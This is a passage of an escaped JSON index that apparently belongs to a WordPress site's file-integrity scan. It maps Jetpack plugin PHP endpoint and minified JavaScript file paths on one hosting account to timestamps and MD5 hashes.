php\":{\"d\":1544704145,\"h\":\"b8222509599d61d866bf6dfac389a246\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-themes-modify-endpoint.php\":{\"d\":1544704145,\"h\":\"3798c5ea323d81311dddd5bd5abffa9c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-maybe-auto-update-endpoint.php\":{\"d\":1544704145,\"h\":\"f952ec255078c1c2523eb3044f2e30fc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/json-api-jetpack-endpoints.php\":{\"d\":1544704145,\"h\":\"f312b8b5e5caa2396a65eb9e61245fd3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-user-create-endpoint.php\":{\"d\":1544704145,\"h\":\"791bfea5e86854f685a7be5f2e0ac299\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-themes-endpoint.php\":{\"d\":1544704145,\"h\":\"5e45dae4b74d019da0fd7635a8b120b4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/jetpack\\/class.jetpack-json-api-themes-get-endpoint.php\":{\"d\":1544704145,\"h\":\"c96bc3b296a2310d365e1725d9b3c504\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-post-endpoint.php\":{\"d\":1544704145,\"h\":\"c20ab1857db0482b70891419fd902853\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-list-comments-endpoint.php\":{\"d\":1544704145,\"h\":\"4946d7b21f050812f8995f68ae3e7073\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-edit-media-v1-2-endpoint.php\":{\"d\":1544704145,\"h\":\"88413029ecf6435217e5a1d3c0a3616f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-update-media-endpoint.php\":{\"d\":1544704145,\"h\":\"607a1c69c318b8f14a1ee018373fc263\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-get-site-v1-2-endpoint.php\":{\"d\":1544704145,\"h\":\"88d581334a05b7c1d395174bad0d9fde\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-get-comments-tree-endpoint.php\":{\"d\":1544704145,\"h\":\"2c781931fdc2cb3cf784b6b629538388\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-update-post-v1-1-endpoint.php\":{\"d\":1544704145,\"h\":\"f217e3ab6e02dd1330756643bf864690\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-get-post-endpoint.php\":{\"d\":1544704145,\"h\":\"648bb4708e5df0e331556b5936d60936\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-get-media-endpoint.php\":{\"d\":1544704145,\"h\":\"d755fdc055c6f0f7d8d3f6253f1503d1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-list-post-type-taxonomies-endpoint.php\":{\"d\":1544704145,\"h\":\"47df9838acaa679d5a435df2d27515ec\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-post-v1-1-endpoint.php\":{\"d\":1544704145,\"h\":\"c62a98a91eec908a8640001192c51370\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-render-embed-reversal-endpoint.php\":{\"d\":1544704145,\"h\":\"7e0662aa344576c44f87465700800567\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-update-post-endpoint.php\":{\"d\":1544704145,\"h\":\"480e019a6756e030b8b47d203d8a39fe\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-get-taxonomy-endpoint.php\":{\"d\":1544704145,\"h\":\"acad414573e73eddefb79a1c49dd5a08\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-autosave-post-v1-1-endpoint.php\":{\"d\":1544704145,\"h\":\"f44756960bd1819359752cad84707386\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-get-customcss.php\":{\"d\":1544704145,\"h\":\"0cdab3a6a43d2927be2703fef356aa91\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-list-roles-endpoint.php\":{\"d\":1544704145,\"h\":\"7f082a8cf0e2fb2c6740ac50a6195636\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-site-settings-v1-4-endpoint.php\":{\"d\":1544704145,\"h\":\"274ccbc324c316a0df3026f5c558a58d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-update-comment-endpoint.php\":{\"d\":1544704145,\"h\":\"b0ba3eda67e6aa37c3fc2f6937719ae3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-render-embed-endpoint.php\":{\"d\":1544704145,\"h\":\"e70c60819824d64cf6d40eaef49dc515\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-render-shortcode-endpoint.php\":{\"d\":1544704145,\"h\":\"9378f9b99385bedd41e2a0dd48e096b0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-get-autosave-v1-1-endpoint.php\":{\"d\":1544704145,\"h\":\"e024235cd581952d3c011d199073e78a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-list-users-endpoint.php\":{\"d\":1544704145,\"h\":\"f84925669d0673a7d0ed426d2ddb5e3c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-add-widget-endpoint.php\":{\"d\":1544704145,\"h\":\"1ca6f0d3901dfe25df96aee01f4dd78a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-site-settings-v1-3-endpoint.php\":{\"d\":1544704145,\"h\":\"83c183a29e5841976ee30eb8b8fd1037\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-get-post-counts-v1-1-endpoint.php\":{\"d\":1544704145,\"h\":\"e6a19e51f4f77fd8d2004874e3d7fc42\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-list-posts-v1-1-endpoint.php\":{\"d\":1544704145,\"h\":\"10bd24e9960ecd2caf2378af707d87f4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-list-posts-v1-2-endpoint.php\":{\"d\":1544704145,\"h\":\"edab2f41721b38e769c8a9a0d3150d92\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-get-comment-counts-endpoint.php\":{\"d\":1544704145,\"h\":\"7494f27a9bac6c1a0094c59779dbd1c5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-get-media-v1-1-endpoint.php\":{\"d\":1544704145,\"h\":\"c7552f7e4c9f868546314824f110fd63\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-list-posts-endpoint.php\":{\"d\":1544704145,\"h\":\"614c4649ee3721eddf1749bd786dc041\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-bulk-update-comments-endpoint.php\":{\"d\":1544704145,\"h\":\"03f8f409a176f91dece84b4c110919ea\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-get-term-endpoint.php\":{\"d\":1544704145,\"h\":\"90996bbf381442baa34e38d39b180319\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-list-post-types-endpoint.php\":{\"d\":1544704145,\"h\":\"b84e6670f88de1c0b21a847983ddb31a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-get-taxonomies-endpoint.php\":{\"d\":1544704145,\"h\":\"212cb997e29b83f72b8ff9df110de599\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-comment-endpoint.php\":{\"d\":1544704145,\"h\":\"7d6889fc555942449ee378960d8006cb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-site-user-endpoint.php\":{\"d\":1544704145,\"h\":\"27edcea8eb21e1c5c61531d63c9250d9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-list-shortcodes-endpoint.php\":{\"d\":1544704145,\"h\":\"f36ee20ce8c84cc7f15e9d71de90aeff\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-get-comment-endpoint.php\":{\"d\":1544704145,\"h\":\"e79f3f76a4249b42b6f5344dbb356d98\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-menus-v1-1-endpoint.php\":{\"d\":1544704145,\"h\":\"90edae7f1a6f79a896d925c77bfe6a72\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-get-site-endpoint.php\":{\"d\":1544704145,\"h\":\"a642c32d7b7f514b4ce638e171b7eca1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-update-user-endpoint.php\":{\"d\":1544704145,\"h\":\"8609811529936851be544563848b958a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-site-settings-endpoint.php\":{\"d\":1544704145,\"h\":\"4d23b418d5b313127a88f3fef643c82d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-delete-media-endpoint.php\":{\"d\":1544704145,\"h\":\"c3dfb83daca84e17ec8b72ec1ef828b8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-list-media-endpoint.php\":{\"d\":1544704145,\"h\":\"2b05d7f01e9a061e953df2ba9b70c3e5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-get-comment-history-endpoint.php\":{\"d\":1544704145,\"h\":\"a4ea152bc1c7fab09afd4f5d6036f3e0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-update-taxonomy-endpoint.php\":{\"d\":1544704145,\"h\":\"11cf6a2d40f535a311ee8f710fd70237\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-taxonomy-endpoint.php\":{\"d\":1544704145,\"h\":\"68076c7cb3dcea2f8cb916c1e45291e8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-update-media-v1-1-endpoint.php\":{\"d\":1544704145,\"h\":\"f63a960b2f1a9187db39b2a1fde2687e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-update-site-homepage-endpoint.php\":{\"d\":1544704145,\"h\":\"cbf3da3d6efc5b2866adc4a271567d4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-update-customcss.php\":{\"d\":1544704145,\"h\":\"e1195519da8a4100f3b8200538b0606c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-delete-media-v1-1-endpoint.php\":{\"d\":1544704145,\"h\":\"b7d981d0327001eb966456e87c87d194\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-bulk-delete-post-endpoint.php\":{\"d\":1544704145,\"h\":\"e34034a9da22167a63dbf41721c579a6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-get-post-v1-1-endpoint.php\":{\"d\":1544704145,\"h\":\"b643244571a27a71ed97d9a9b7a63864\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-list-media-v1-2-endpoint.php\":{\"d\":1544704145,\"h\":\"3cdc0c60ff22f9f19d7067edf8bb9843\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-list-terms-endpoint.php\":{\"d\":1544704145,\"h\":\"a5c72d6b7f6576dfe2822e417c98ee6f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-upload-media-v1-1-endpoint.php\":{\"d\":1544704145,\"h\":\"996f5e70afdb764d2eb68df8e3b1a25f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-update-site-logo-endpoint.php\":{\"d\":1544704145,\"h\":\"062c2a1d5639f24744c7863f276e95cf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-list-media-v1-1-endpoint.php\":{\"d\":1544704145,\"h\":\"5b45c7908f2a00ec13e54d94cf2c74f0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-get-media-v1-2-endpoint.php\":{\"d\":1544704145,\"h\":\"b9b57143329ac658ba89c82a18bd2b58\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-bulk-restore-post-endpoint.php\":{\"d\":1544704145,\"h\":\"ea61f9e24fc7383c8bb1177558c50f86\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-upload-media-endpoint.php\":{\"d\":1544704145,\"h\":\"f29de367c7be5ae604f621a88952d7b2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-get-comments-tree-v1-1-endpoint.php\":{\"d\":1544704145,\"h\":\"1b6714c02901e2be79e8cdfdaaaf7751\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-list-embeds-endpoint.php\":{\"d\":1544704145,\"h\":\"92e5130186380dd5a4a3d639987469ce\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-update-post-v1-2-endpoint.php\":{\"d\":1544704145,\"h\":\"1c6c22f32b6fcf58e3111cba5a30d14d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-update-term-endpoint.php\":{\"d\":1544704145,\"h\":\"9fda3c775ae355599215506b350d431b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-site-settings-v1-2-endpoint.php\":{\"d\":1544704145,\"h\":\"236a42b32b9b63d3c72564c0e45a45e8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-get-comments-tree-v1-2-endpoint.php\":{\"d\":1544704145,\"h\":\"b2a944da7da66c59f65f245e796afe7d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-render-endpoint.php\":{\"d\":1544704145,\"h\":\"4b45099f7d3686a44ed4d3260be19d3d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/json-endpoints\\/class.wpcom-json-api-sharing-buttons-endpoint.php\":{\"d\":1544704145,\"h\":\"b33002285fe538e59e44945a60189c38\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/custom-post-types\\/js\\/many-items.min.js\":{\"d\":1544704145,\"h\":\"8357be672abcb2a3f0f26d2311388fa9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/custom-post-types\\/js\\/menu-checkboxes.min.js\":{\"d\":1544704145,\"h\":\"4ad646adb7d7498d04091f1ed6316eda\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/custom-post-types\\/js\\/nova-drag-drop.min.js\":{\"d\":1544704145,\"h\":\"8a7862bc46dff788e0903d46d6dc1a58\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/custom-post-types\\/comics\\/comics.min.js\":{\"d\":1544704145,\"h\":\"118ebc901f1a198c81f96bd09994b4dd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/infinite-scroll\\/infinity.min.js\":{\"d\":1544704145,\"h\":\"a009d3a032dc65f39fcd8b0adf7008fb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/minileven\\/theme\\/pub\\/minileven\\/js\\/small-menu.min.js\":{\"d\":1544704145,\"h\":\"2942010dbedfdf8ffec1dd2e57455bcd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/carousel\\/jetpack-carousel.min.js\":{\"d\":1544704145,\"h\":\"651e0ed4a74743e5c0c56e9ecc1a22f9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/widgets\\/google-plus\\/js\\/admin.min.js\":{\"d\":1544704145,\"h\":\"acba1876a9d2e9d69222571368afb10a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/widgets\\/contact-info\\/contact-info-admin.min.js\":{\"d\":1544704145,\"h\":\"874c0f225dfc88e482699073ca6c07c2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/widgets\\/social-icons\\/social-icons-admin.min.js\":{\"d\":1544704145,\"h\":\"eb176e04616bc7865868fa6c447bb8ab\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/widgets\\/eu-cookie-law\\/eu-cookie-law.min.js\":{\"d\":1544704145,\"h\":\"1393b51a3b56a42a9c373a0ae7ae742d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/widgets\\/eu-cookie-law\\/eu-cookie-law-admin.min.js\":{\"d\":1544704145,\"h\":\"05fdfba475ffb1f96a97fc7b298a9ec9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/widgets\\/milestone\\/milestone.min.js\":{\"d\":1544704145,\"h\":\"05d215f42683c04142baec7a7a4a2726\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/widgets\\/milestone\\/admin.min.js\":{\"d\":1544704145,\"h\":\"5e4053d31a8b5b4cdfe9969af4038e6c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/widgets\\/gallery\\/js\\/gallery.min.js\":{\"d\":1544704145,\"h\":\"2ef741e31d0b5a80dac61a3edb7e0085\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/widgets\\/gallery\\/js\\/admin.min.js\":{\"d\":1544704145,\"h\":\"18e380d65638c7152d454b2570fc41ec\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/widgets\\/google-translate\\/google-translate.min.js\":{\"d\":1544704145,\"h\":\"318da5576a5cf8feca2ae6184c28bca2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/widgets\\/search\\/js\\/search-widget-admin.min.js\":{\"d\":1544704145,\"h\":\"9d0a496390775c6eff8ff8bfb0c08023\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/widgets\\/search\\/js\\/search-widget.min.js\":{\"d\":1544704145,\"h\":\"26d34fc3e745864019fbb7ce6dbc7be6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/widgets\\/simple-payments\\/customizer.min.js\":{\"d\":1544704145,\"h\":\"a7492fd92c7544e7ab0671771fa2283d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/widgets\\/customizer-utils.min.js\":{\"d\":1544704145,\"h\":\"b5a1327370787633f2e09673fdf1b4a6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/widgets\\/twitter-timeline-admin.min.js\":{\"d\":1544704145,\"h\":\"e2cbfc0503c074fcba1c146d558d143c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/custom-css\\/custom-css\\/js\\/css-editor.min.js\":{\"d\":1544704145,\"h\":\"d767b2088da52ef30899e69b4fb242c0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/custom-css\\/custom-css\\/js\\/core-customizer-css-preview.min.js\":{\"d\":1544704145,\"h\":\"d76f894017533907335b91ce6b9870cc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/custom-css\\/custom-css\\/js\\/use-codemirror.min.js\":{\"d\":1544704145,\"h\":\"1630f04638270cc53cf615648120669d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/custom-css\\/custom-css\\/js\\/core-customizer-css.min.js\":{\"d\":1544704145,\"h\":\"a961313da6745563772d42a26332d111\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/custom-css\\/custom-css\\/js\\/core-customizer-css.core-4.9.min.js\":{\"d\":1544704145,\"h\":\"8a5de1ab997c4882c2a56520fe6da14c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/after-the-deadline\\/tinymce\\/plugin.min.js\":{\"d\":1544704145,\"h\":\"ac5f679b320c8e08ae314cb67fcca84c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/after-the-deadline\\/tinymce\\/editor_plugin.min.js\":{\"d\":1544704149,\"h\":\"9ce53819a2a16565ff765594a6f016f9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/after-the-deadline\\/atd.core.min.js\":{\"d\":1544704145,\"h\":\"b47190c4b76975cee10f94eee7824f59\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/after-the-deadline\\/atd-nonvis-editor-plugin.min.js\":{\"d\":1544704145,\"h\":\"300c159ecbf2edbffed067f80ed5ba4f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/after-the-deadline\\/atd-autoproofread.min.js\":{\"d\":1544704149,\"h\":\"21dff996a82fe242340815cb73ca16ed\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/after-the-deadline\\/jquery.atd.min.js\":{\"d\":1544704149,\"h\":\"25494c97ad7558631fa935c533d7d31b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/related-posts\\/related-posts.min.js\":{\"d\":1544704149,\"h\":\"83b8982ff617f55e651fe9f351168dec\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/related-posts\\/related-posts-customizer.min.js\":{\"d\":1544704149,\"h\":\"15d737020602b0b806133e6cfe89d587\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/widget-visibility\\/widget-conditions\\/widget-conditions.min.js\":{\"d\":1544704149,\"h\":\"fee3bc6d25ea3db6b4c487b0deae6b2e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/contact-form\\/js\\/tinymce-plugin-form-button.min.js\":{\"d\":1544704149,\"h\":\"4d592a120d03596fe4cea745791b3e12\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/contact-form\\/js\\/editor-view.min.js\":{\"d\":1544704149,\"h\":\"70bbbf3a43fe34aa967508219892d014\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/_inc\\/build\\/contact-form\\/js\\/grunion.min.js\":{\"d\":1544704149,\"h\":\"656d7c28e50556146a0a7